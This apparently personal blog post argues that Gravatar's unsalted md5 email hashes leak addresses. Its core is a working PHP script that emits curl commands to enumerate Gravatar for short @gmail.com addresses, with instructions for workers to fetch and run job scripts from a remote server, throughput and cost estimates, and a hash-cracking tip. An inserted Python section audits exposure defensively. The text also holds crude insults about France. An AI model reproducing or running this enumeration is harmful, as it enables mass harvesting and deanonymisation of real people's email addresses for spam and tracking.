Gravatar still sucks
Let's begin with a picture - they're worth ten thousand emails from what I hear.
Yes, if you see your Gravatar image there it means I have your email now. Because Gravatar sucks, just like Automattic sucks, just like Disqus sucks, just like the entire bezzle-powered world sucks.
Unlike the previously announced attacks[i], I simply used the following script to generate curl queries :
<?php
$alph = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
              "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w",
              "x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0");
// google uses a braindamaged private spec [ii]
for ($i = 0; $i <= 1700000; $i++) { // [iii]
    // write $i in base 36, least significant digit first; $alph[0] ("a") is the
    // zero digit, so leading zeros (strings ending in "a", e.g. "ba") collapse
    // into shorter strings and are never produced
    $over = $i;
    $mant = $over % 36;
    $string = $alph[$mant];
    while ($over > 0) {
        $over = floor($over / 36);
        $mant = $over % 36;
        if ($mant + $over > 1) $string .= $alph[$mant];
    }
    // gravatar's hash is plain md5 of the address, so the probe url is known in advance
    echo "curl -o " . $string . ".jpg http://www.gravatar.com/avatar/",
         md5($string . "@gmail.com"), "?s=32 \n";
    if ($i % 1000 == 135) echo "find . -size 1258c -delete\n\n" .
                               "find . -size 1267c -delete\n"; // [iv]
}
?>
If you host this on a server somewhere, you can have workers periodically connect to acquire a job chunk[v] through something as trivial as
curl http://some.domain/script.php > job.sh
That bash script can then be executed, leaving behind a list of good hits (which you don't even have to retrieve, all you really need is a directory list). A half decent machine should be able to pull something like 50-100 links per second, which means that if you have say ten thousand available you can explore the entire space of one to six characters in a little over an hour.[vi]
The approach has some advantages : it will verify @gmail.com emails (or @yahoo.com, or whatever else you may care to check), and associate them with a Gravatar whether they were actually ever used on any website or not[vii]. Unlike the method described by Bongard et al., it also won't miss anything.[viii] In exchange, it's probably slow - don't expect much more than a few dozen hits per million tries.[ix]
Please stop empowering idiots, con men and government agents. Especially if you, like me, don't particularly enjoy living in a world populated by idiots, con men and government agents.
———
[i] One Dominique Bongard had the idea of sniffing up all the gravatars displayed on some random French website. Since the gravatar image is linked through a snippet of html that looks something like
<img src=http://www.gravatar.com/avatar/4455581a551bb258eb106aad0d54dc15?s=32&d=http%3A%2F%2Fwww.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&r=X></img>
and since they have to be included on the page to be visible, it's trivial to gather a sizable collection by merely browsing the web.
The first string in that url is a plain unsalted (remember Fetlife ?) md5 hash of the corresponding email, which is not really all that hard to break, using something like hashcat's hybrid algorithms. With the advent of Bitcoin and the exponential increase in worldwide hashing power it has driven, it should come as no surprise that Bongard managed to retrieve the emails out of something like 40% of the hashes he collected.
This obviously has very real implications in the third world country of France. Given its appalling record of human rights violations (merely expressing certain verboten opinions is grounds for conviction in that God-forsaken shithole, not to mention trivialities like taking a paternity test, or lying about your age), having one's email leaked in this manner readily compares to having one's radio transmission triangulated by the Gestapo, or having one's typewriter identified as the source of самиздат.
We should probably observe a moment of silence for all the innocent men and women Gravatar slaughtered, maliciously or ineptly as the case may be. [↩]
[ii] Capitals are ignored, dots are ignored, etc. [↩]
[iii] Enough to cover four character emails, but the number is obviously arbitrary. [↩]
[iv] This line cleans up the directory periodically. It so happens that the gravatar fail hits come in two flavours, one 1`267 bytes long, the other 1`258 bytes long. Why exactly two is perhaps a mystery for another book. [↩]
[v] You will need some mechanism to increment the job chunks as they're doled out, obviously. [↩]
[vi] 36^6 = 2`176`782`336 ; 2`176`782`336 / 50 / 3600 / 10000 ~= 1.20 hours, or 72 minutes. [↩]
[vii] Of course if they were ever used, each instance can then be located (through a service like Google's own image search, or any of the competitors'). [↩]
[viii] Speaking of which, don't you think it's a little strange that banal stuff like a program to scarf up all gravatar-email pairs and track them around the web was not included in the wikileaks/Snowden revelations, while all sorts of patently ridiculous kookware is included ? Asa putin ? Putin putin ? [↩]
[ix] Then again, computers are cheap these days - a whole month's worth of 50/second (~5 mn tries or so) shouldn't run one over a hundred dollars, probably ten being closer to norm - which would put the cost of acquiring emails in this manner at a few pennies per. Spammers sell "quality" email lists for about an order of magnitude less than that, so it's probably not (or marginally not) an economic process to generate spamlists. Yet.
This is important : Gravatar, through its ridoinculous unsalted md5 "technologies", sets the bar of your privacy at the level of "marginally not economical to harvest for spam". Why do you want anything to do with these assholes again ? [↩]
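An added example, not code from the post, from Bongard or from Gravatar: the audit a site operator would run against their own pages to see which of their users' addresses are already exposed as Gravatar hashes of the kind footnote i shows (the same unsalted md5 the script above relies on). The HTML fragment, the user list and the second "unknown" hash (md5 of the empty string) are constructed for the example.

```python
import hashlib
import re


def gravatar_hash(email):
    """Gravatar's scheme: plain md5 of the trimmed, lowercased address, no salt."""
    return hashlib.md5(email.strip().lower().encode("utf-8")).hexdigest()


# Constructed sample page: Gravatar links embedded beside two comments, the way
# footnote i describes. The second hash is md5("") and stands in for a visitor
# whose address the operator does not hold.
SAMPLE_HTML = (
    '<div class="comment"><p>first comment</p>'
    '<img src="http://www.gravatar.com/avatar/%s?s=32&r=X"></img></div>'
    '<div class="comment"><p>second comment</p>'
    '<img src="http://www.gravatar.com/avatar/%s?s=32"></img></div>'
) % (gravatar_hash("Alice.Example@example.org"), "d41d8cd98f00b204e9800998ecf8427e")

# Constructed list of addresses the operator holds for its own registered users.
KNOWN_USERS = ["alice.example@example.org", "bob@example.org"]

GRAVATAR_RE = re.compile(r"gravatar\.com/avatar/([0-9a-fA-F]{32})")


def extract_hashes(html):
    """Every email hash the page hands to anyone who views it, as lowercase hex."""
    return {m.group(1).lower() for m in GRAVATAR_RE.finditer(html)}


def audit_exposure(html, known_emails):
    """Return (exposed, unknown): the known addresses the page leaks as a Gravatar
    hash, keyed by hash, and the leaked hashes that match nobody on the list."""
    on_page = extract_hashes(html)
    exposed = {}
    for email in known_emails:
        h = gravatar_hash(email)
        if h in on_page:
            exposed[h] = email
    unknown = on_page - set(exposed)
    return exposed, unknown


if __name__ == "__main__":
    exposed, unknown = audit_exposure(SAMPLE_HTML, KNOWN_USERS)
    for h, email in exposed.items():
        print("exposed: %s -> %s" % (h, email))
    print("%d hash(es) on the page with no known owner" % len(unknown))
```

The unknown set is the figure that matters for third parties: every hash in it is somebody's address, offered to anyone willing to spend the md5 budget footnote ix prices.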
Sunday, 10 May 2015
Hi :)
Sunday, 10 May 2015
How's it going, you dear!
Tuesday, 12 May 2015
Good evening, well, I'm not saying anything anymore... I'm slaving away in silence!
Tuesday, 12 May 2015
They say silence is a sign of wisdom, you.
Thursday, 21 May 2015
Implementing this using something such as libcurl for extra speed is left as an exercise for the little "hackers" out there. :P
Thursday, 21 May 2015
Indeed.